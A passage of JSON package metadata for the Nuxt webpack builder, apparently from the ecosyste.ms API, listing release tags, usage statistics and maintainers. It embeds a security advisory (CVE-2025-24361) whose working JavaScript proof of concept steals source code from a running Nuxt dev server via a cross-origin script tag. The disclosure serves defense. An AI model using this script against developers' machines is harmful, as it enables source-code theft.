pi/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-09-08T14:59:12.210Z","dependent_packages_count":11,"downloads":8586,"downloads_period":"last-month","dependent_repos_count":319,"rankings":{"downloads":2.2983423989378076,"dependent_repos_count":0.9045793030595785,"dependent_packages_count":1.9086946598830379,"stargazers_count":0.15559799533710655,"forks_count":0.5233980135042239,"docker_downloads_count":null,"average":1.1581224741443508},"purl":"pkg:npm/%40nuxt/webpack-builder","advisories":[{"uuid":"GSA_kwCzR0hTQS00Z2Y3LWZmOHgtaHE5Oc4ABD1p","url":"https://github.com/advisories/GHSA-4gf7-ff8x-hq99","title":"Opening a malicious website while running a Nuxt dev server could allow read-only access to code","description":"### Summary\nSource code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.\n\n### Details\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:3000/_nuxt/app.js\"\u003e` in their site and run the script.\nBy using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code.\n\n### PoC\n1. Create a nuxt project with webpack / rspack builder.\n1. Run `npm run dev`\n1. Open `http://localhost:3000`\n1. Run the script below in a web site that has a different origin.\n1. You can see the source code output in the document and the devtools console.\n\n```js\nconst script = document.createElement('script')\nscript.src = 'http://localhost:3000/_nuxt/app.js'\nscript.addEventListener('load', () =\u003e {\n  for (const page in window.webpackChunknuxt_app) {\n    const moduleList = window.webpackChunknuxt_app[page][1]\n    console.log(moduleList)\n\n    for (const key in moduleList) {\n      const p = document.createElement('p')\n      const title = document.createElement('strong')\n      title.textContent = key\n      const code = document.createElement('code')\n      code.textContent = moduleList[key].toString()\n      p.append(title, ':', document.createElement('br'), code)\n      document.body.appendChild(p)\n    }\n  }\n})\ndocument.head.appendChild(script)\n```\n\n![image](https://github.com/user-attachments/assets/201e39b7-da5c-4359-867f-96c9adfd3c85)\nIt contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the `sourcesContent` field).\n\n### Impact\nUsers using webpack / rspack builder may get the source code stolen by malicious websites.\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-01-27T11:31:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N","references":["https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99","https://nvd.nist.gov/vuln/detail/CVE-2025-24361","https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f","https://github.com/advisories/GHSA-4gf7-ff8x-hq99"],"source_kind":"github","identifiers":["GHSA-4gf7-ff8x-hq99","CVE-2025-24361"],"repository_url":"https://github.com/nuxt/nuxt","blast_radius":0.0,"created_at":"2025-01-27T12:09:15.495Z","updated_at":"2026-05-09T06:03:28.674Z","epss_percentage":0.00253,"epss_percentile":0.48544,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00Z2Y3LWZmOHgtaHE5Oc4ABD1p","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00Z2Y3LWZmOHgtaHE5Oc4ABD1p","packages":[{"ecosystem":"npm","package_name":"@nuxt/rspack-builder","versions":[{"first_patched_version":"3.15.3","vulnerable_version_range":"\u003e= 3.12.2, \u003c 3.15.3"}],"purl":"pkg:npm/%40nuxt%2Frspack-builder"},{"ecosystem":"npm","package_name":"@nuxt/webpack-builder","versions":[{"first_patched_version":"3.15.3","vulnerable_version_range":"\u003e= 3.0.0, \u003c 3.15.3"}],"purl":"pkg:npm/%40nuxt%2Fwebpack-builder"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00Z2Y3LWZmOHgtaHE5Oc4ABD1p/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/webpack-builder","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/webpack-builder","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/webpack-builder/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-09-07T20:15:38.819Z","issues_count":5600,"pull_requests_count":3061,"avg_time_to_close_issue":9598820.406109164,"avg_time_to_close_pull_request":917616.7577526451,"issues_closed_count":3975,"pull_requests_closed_count":2739,"pull_request_authors_count":426,"issue_authors_count":2527,"avg_comments_per_issue":5.092142857142857,"avg_comments_per_pull_request":2.125449199607971,"merged_pull_requests_count":2441,"bot_issues_count":1,"bot_pull_requests_count":1030,"past_year_issues_count":3007,"past_year_pull_requests_count":2334,"past_year_avg_time_to_close_issue":1435446.9934823092,"past_year_avg_time_to_close_pull_request":302464.36299100803,"past_year_issues_closed_count":2134,"past_year_pull_requests_closed_count":2111,"past_year_pull_request_authors_count":336,"past_year_issue_authors_count":1536,"past_year_avg_comments_per_issue":3.426671100764882,"past_year_avg_comments_per_pull_request":2.1032562125107113,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":817,"past_year_merged_pull_requests_count":1921,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":775,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":220,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":124,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":74,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"userquin","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"warflash","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"wattanx","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"atinux","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":565,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":161,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"pi0","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"BobbieGoede","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"Atinux","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"dargmuesli","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"warflash","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"madebyfabian","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"atinux","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:25:38.191Z","updated_at":"2023-08-19T18:25:38.191Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096142,"name":"@nuxt/utils","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":62,"first_release_published_at":"2019-01-28T18:04:54.243Z","latest_release_published_at":"2024-06-28T11:34:45.595Z","latest_release_number":"2.18.1","last_synced_at":"2026-05-10T19:31:13.277Z","created_at":"2022-04-08T10:39:37.282Z","updated_at":"2026-05-10T19:31:13.277Z","registry_url":"https://www.npmjs.com/package/@nuxt/utils","install_command":"npm install @nuxt/utils","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"2x":"2.16.2","latest":"2.18.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue 